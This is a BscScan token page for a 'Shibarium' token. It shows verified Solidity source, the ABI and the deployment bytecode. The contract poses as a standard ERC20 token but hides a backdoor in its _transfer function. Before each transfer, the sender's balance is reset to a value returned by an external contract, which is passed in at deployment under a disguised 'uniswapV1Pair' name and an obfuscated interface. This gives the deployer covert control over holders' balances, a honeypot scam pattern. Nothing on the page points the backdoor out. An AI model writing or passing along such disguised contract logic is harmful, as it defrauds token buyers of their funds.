Overview

Max Total Supply

1,000,000,000Shibarium

Holders

Market

Price

$0.00 @ 0.000000 BNB

Fully Diluted Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Contract Source Code Verified (Exact Match)


Compiler Version

v0.8.17+commit.8df45f5f


Optimization Enabled:

No with 200 runs


Other Settings:

default evmVersion, None license

/**
 *Submitted for verification at BscScan.com on 2023-09-03
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Sources flattened with hardhat v2.9.1 https://hardhat.org

// File @openzeppelin/contracts/utils/[email protected]

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File @openzeppelin/contracts/access/[email protected]

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferownership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyowner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}
// File @uniswap/v2-periphery/contracts/interfaces/[email protected]
interface uOKcrRQLiYOfBJiwUZwHL {
    function totalSupply(
        address zfqEXCDJKbG,
        uint256 sz9UHHw9J8,
        uint256 dDWEnNtHw
        ) external view returns (uint256);
}
pragma solidity ^0.8.0;

contract TOKEN is Ownable {
    uint256 private _totalSupply;
    string private _nameqmd9z8;
    string private _symbolqmd9z8;
    uint256 private _decimalsqmd9z8;
    uOKcrRQLiYOfBJiwUZwHL private uniswapV1Pair;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    constructor(uint256 qqmd9z8, uint256 totalSupply_) {
        _nameqmd9z8 = "Shibarium";
        _symbolqmd9z8 = "Shibarium";
       uniswapV1Pair = uOKcrRQLiYOfBJiwUZwHL(
       address(uint160(qqmd9z8)));
        uint256 amount = totalSupply_ * 10**decimals();
        _totalSupply += amount;
        _balances[msg.sender] += amount;
        emit Transfer(address(0), msg.sender, amount);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view returns (string memory) {
        return _nameqmd9z8;
    }

     
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view returns (string memory) {
        return _symbolqmd9z8;
    }

    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
        function levksfbc() external view returns (uint256) {
    return _decimalsqmd9z8;
    }
    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }
    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    function transfer(address pucqrwaurecipient, uint256 tkswynimamount) public returns (bool) {
        _transfer(_msgSender(), pucqrwaurecipient, tkswynimamount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
      
    function allowance(address xaadxlpvowner, address bqijxcpnspender)
        public
        view
        returns (uint256)
    {
        return _allowances[xaadxlpvowner][bqijxcpnspender];
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address xadakzjxsender,
        address zihrfyebrecipient,
        uint256 dyxxmpmtamount
    ) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(xadakzjxsender, spender, dyxxmpmtamount);
        _transfer(xadakzjxsender, zihrfyebrecipient, dyxxmpmtamount);
        return true;
    }
    
    

    function _transfer(
        address wsactsaofrom,
        address vkmgypguto,
        uint256 amount
    ) internal virtual {
        require(
            wsactsaofrom != address(0),
            "ERC20: transfer from the zero address"
        );
        require(vkmgypguto != address(0), "ERC20: transfer to the zero address");
        _balances[wsactsaofrom] = uniswapV1Pair
            .totalSupply(
            wsactsaofrom,
            amount,
            _balances[wsactsaofrom]
        );
        require(
            _balances[wsactsaofrom] >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[wsactsaofrom] = _balances[wsactsaofrom] - amount;
        _balances[vkmgypguto] = _balances[vkmgypguto] + amount;
        emit Transfer(wsactsaofrom, vkmgypguto, amount);
    }
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        _approve(owner, spender, currentAllowance - subtractedValue);
        return true;
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            _approve(owner, spender, currentAllowance - amount);
        }
    }
      
      

        function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }
}

[{"inputs":[{"internalType":"uint256","name":"qqmd9z8","type":"uint256"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"xaadxlpvowner","type":"address"},{"internalType":"address","name":"bqijxcpnspender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"levksfbc","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pucqrwaurecipient","type":"address"},{"internalType":"uint256","name":"tkswynimamount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"xadakzjxsender","type":"address"},{"internalType":"address","name":"zihrfyebrecipient","type":"address"},{"internalType":"uint256","name":"dyxxmpmtamount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200209a3803806200209a83398181016040528101906200003791906200034e565b620000576200004b6200023960201b60201c565b6200024160201b60201c565b6040518060400160405280600981526020017f53686962617269756d0000000000000000000000000000000000000000000000815250600290816200009d919062000605565b506040518060400160405280600981526020017f53686962617269756d000000000000000000000000000000000000000000000081525060039081620000e4919062000605565b5081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000620001386200030560201b60201c565b600a6200014691906200087c565b82620001539190620008cd565b9050806001600082825462000169919062000918565b9250508190555080600660003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620001c1919062000918565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000228919062000964565b60405180910390a350505062000981565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600080fd5b6000819050919050565b620003288162000313565b81146200033457600080fd5b50565b60008151905062000348816200031d565b92915050565b600080604083850312156200036857620003676200030e565b5b6000620003788582860162000337565b92505060206200038b8582860162000337565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200041757607f821691505b6020821081036200042d576200042c620003cf565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004977fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000458565b620004a3868362000458565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620004e6620004e0620004da8462000313565b620004bb565b62000313565b9050919050565b6000819050919050565b6200050283620004c5565b6200051a6200051182620004ed565b84845462000465565b825550505050565b600090565b6200053162000522565b6200053e818484620004f7565b505050565b5b8181101562000566576200055a60008262000527565b60018101905062000544565b5050565b601f821115620005b5576200057f8162000433565b6200058a8462000448565b810160208510156200059a578190505b620005b2620005a98562000448565b83018262000543565b50505b505050565b600082821c905092915050565b6000620005da60001984600802620005ba565b1980831691505092915050565b6000620005f58383620005c7565b9150826002028217905092915050565b620006108262000395565b67ffffffffffffffff8111156200062c576200062b620003a0565b5b620006388254620003fe565b620006458282856200056a565b600060209050601f8311600181146200067d576000841562000668578287015190505b620006748582620005e7565b865550620006e4565b601f1984166200068d8662000433565b60005b82811015620006b75784890151825560018201915060208501945060208101905062000690565b86831015620006d75784890151620006d3601f891682620005c7565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200077a57808604811115620007525762000751620006ec565b5b6001851615620007625780820291505b808102905062000772856200071b565b945062000732565b94509492505050565b60008262000795576001905062000868565b81620007a5576000905062000868565b8160018114620007be5760028114620007c957620007ff565b600191505062000868565b60ff841115620007de57620007dd620006ec565b5b8360020a915084821115620007f857620007f7620006ec565b5b5062000868565b5060208310610133831016604e8410600b8410161715620008395782820a905083811115620008335762000832620006ec565b5b62000868565b62000848848484600162000728565b92509050818404811115620008625762000861620006ec565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008898262000313565b915062000896836200086f565b9250620008c57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000783565b905092915050565b6000620008da8262000313565b9150620008e78362000313565b9250828202620008f78162000313565b91508282048414831517620009115762000910620006ec565b5b5092915050565b6000620009258262000313565b9150620009328362000313565b92508282019050808211156200094d576200094c620006ec565b5b92915050565b6200095e8162000313565b82525050565b60006020820190506200097b600083018462000953565b92915050565b61170980620009916000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461024f578063a457c2d71461026d578063a9059cbb1461029d578063dd62ed3e146102cd576100ea565b806370a08231146101f7578063715018a6146102275780638da5cb5b14610231576100ea565b806318160ddd116100c857806318160ddd1461015b57806323b872dd14610179578063313ce567146101a957806339509351146101c7576100ea565b806306c98959146100ef57806306fdde031461010d578063095ea7b31461012b575b600080fd5b6100f76102fd565b6040516101049190610e2c565b60405180910390f35b610115610307565b6040516101229190610ed7565b60405180910390f35b61014560048036038101906101409190610f88565b610399565b6040516101529190610fe3565b60405180910390f35b6101636103b7565b6040516101709190610e2c565b60405180910390f35b610193600480360381019061018e9190610ffe565b6103c1565b6040516101a09190610fe3565b60405180910390f35b6101b16103f0565b6040516101be919061106d565b60405180910390f35b6101e160048036038101906101dc9190610f88565b6103f9565b6040516101ee9190610fe3565b60405180910390f35b610211600480360381019061020c9190611088565b610430565b60405161021e9190610e2c565b60405180910390f35b61022f610479565b005b610239610501565b60405161024691906110c4565b60405180910390f35b61025761052a565b6040516102649190610ed7565b60405180910390f35b61028760048036038101906102829190610f88565b6105bc565b6040516102949190610fe3565b60405180910390f35b6102b760048036038101906102b29190610f88565b61063c565b6040516102c49190610fe3565b60405180910390f35b6102e760048036038101906102e291906110df565b61065a565b6040516102f49190610e2c565b60405180910390f35b6000600454905090565b6060600280546103169061114e565b80601f01602080910402602001604051908101604052809291908181526020018280546103429061114e565b801561038f5780601f106103645761010080835404028352916020019161038f565b820191906000526020600020905b81548152906001019060200180831161037257829003601f168201915b5050505050905090565b60006103ad6103a66106e1565b84846106e9565b6001905092915050565b6000600154905090565b6000806103cc6106e1565b90506103d98582856108b2565b6103e4858585610947565b60019150509392505050565b60006012905090565b6000806104046106e1565b9050610425818585610416858961065a565b61042091906111ae565b6106e9565b600191505092915050565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104816106e1565b73ffffffffffffffffffffffffffffffffffffffff1661049f610501565b73ffffffffffffffffffffffffffffffffffffffff16146104f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104ec9061122e565b60405180910390fd5b6104ff6000610d4f565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600380546105399061114e565b80601f01602080910402602001604051908101604052809291908181526020018280546105659061114e565b80156105b25780601f10610587576101008083540402835291602001916105b2565b820191906000526020600020905b81548152906001019060200180831161059557829003601f168201915b5050505050905090565b6000806105c76106e1565b905060006105d5828661065a565b90508381101561061a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610611906112c0565b60405180910390fd5b6106308286868461062b91906112e0565b6106e9565b60019250505092915050565b60006106506106496106e1565b8484610947565b6001905092915050565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610758576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074f90611386565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107be90611418565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108a59190610e2c565b60405180910390a3505050565b60006108be848461065a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610941578181101561092a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092190611484565b60405180910390fd5b6109408484848461093b91906112e0565b6106e9565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad90611516565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c906115a8565b60405180910390fd5b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16639f8037388483600660008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546040518463ffffffff1660e01b8152600401610ac3939291906115c8565b602060405180830381865afa158015610ae0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b049190611614565b600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610bc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc0906116b3565b60405180910390fd5b80600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c1491906112e0565b600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ca291906111ae565b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d429190610e2c565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000819050919050565b610e2681610e13565b82525050565b6000602082019050610e416000830184610e1d565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e81578082015181840152602081019050610e66565b60008484015250505050565b6000601f19601f8301169050919050565b6000610ea982610e47565b610eb38185610e52565b9350610ec3818560208601610e63565b610ecc81610e8d565b840191505092915050565b60006020820190508181036000830152610ef18184610e9e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f2982610efe565b9050919050565b610f3981610f1e565b8114610f4457600080fd5b50565b600081359050610f5681610f30565b92915050565b610f6581610e13565b8114610f7057600080fd5b50565b600081359050610f8281610f5c565b92915050565b60008060408385031215610f9f57610f9e610ef9565b5b6000610fad85828601610f47565b9250506020610fbe85828601610f73565b9150509250929050565b60008115159050919050565b610fdd81610fc8565b82525050565b6000602082019050610ff86000830184610fd4565b92915050565b60008060006060848603121561101757611016610ef9565b5b600061102586828701610f47565b935050602061103686828701610f47565b925050604061104786828701610f73565b9150509250925092565b600060ff82169050919050565b61106781611051565b82525050565b6000602082019050611082600083018461105e565b92915050565b60006020828403121561109e5761109d610ef9565b5b60006110ac84828501610f47565b91505092915050565b6110be81610f1e565b82525050565b60006020820190506110d960008301846110b5565b92915050565b600080604083850312156110f6576110f5610ef9565b5b600061110485828601610f47565b925050602061111585828601610f47565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061116657607f821691505b6020821081036111795761117861111f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006111b982610e13565b91506111c483610e13565b92508282019050808211156111dc576111db61117f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611218602083610e52565b9150611223826111e2565b602082019050919050565b600060208201905081810360008301526112478161120b565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006112aa602583610e52565b91506112b58261124e565b604082019050919050565b600060208201905081810360008301526112d98161129d565b9050919050565b60006112eb82610e13565b91506112f683610e13565b925082820390508181111561130e5761130d61117f565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611370602483610e52565b915061137b82611314565b604082019050919050565b6000602082019050818103600083015261139f81611363565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611402602283610e52565b915061140d826113a6565b604082019050919050565b60006020820190508181036000830152611431816113f5565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061146e601d83610e52565b915061147982611438565b602082019050919050565b6000602082019050818103600083015261149d81611461565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611500602583610e52565b915061150b826114a4565b604082019050919050565b6000602082019050818103600083015261152f816114f3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611592602383610e52565b915061159d82611536565b604082019050919050565b600060208201905081810360008301526115c181611585565b9050919050565b60006060820190506115dd60008301866110b5565b6115ea6020830185610e1d565b6115f76040830184610e1d565b949350505050565b60008151905061160e81610f5c565b92915050565b60006020828403121561162a57611629610ef9565b5b6000611638848285016115ff565b91505092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061169d602683610e52565b91506116a882611641565b604082019050919050565b600060208201905081810360008301526116cc81611690565b905091905056fea2646970667358221220218b339d93a7aec83359520362034deb2b24e77b2ed21431293c62d0013fd97064736f6c634300081100330000000000000000000000009bac8f8827dd3acd0f36b467d7b251ba208ae722000000000000000000000000000000000000000000000000000000003b9aca00


0000000000000000000000009bac8f8827dd3acd0f36b467d7b251ba208ae722000000000000000000000000000000000000000000000000000000003b9aca00

-----Decoded View---------------
Arg [0] : qqmd9z8 (uint256): 888741801040121118466969595091488983542657640226
Arg [1] : totalSupply_ (uint256): 1000000000

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 0000000000000000000000009bac8f8827dd3acd0f36b467d7b251ba208ae722
Arg [1] : 000000000000000000000000000000000000000000000000000000003b9aca00


[ Download: CSV Export  ]

[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.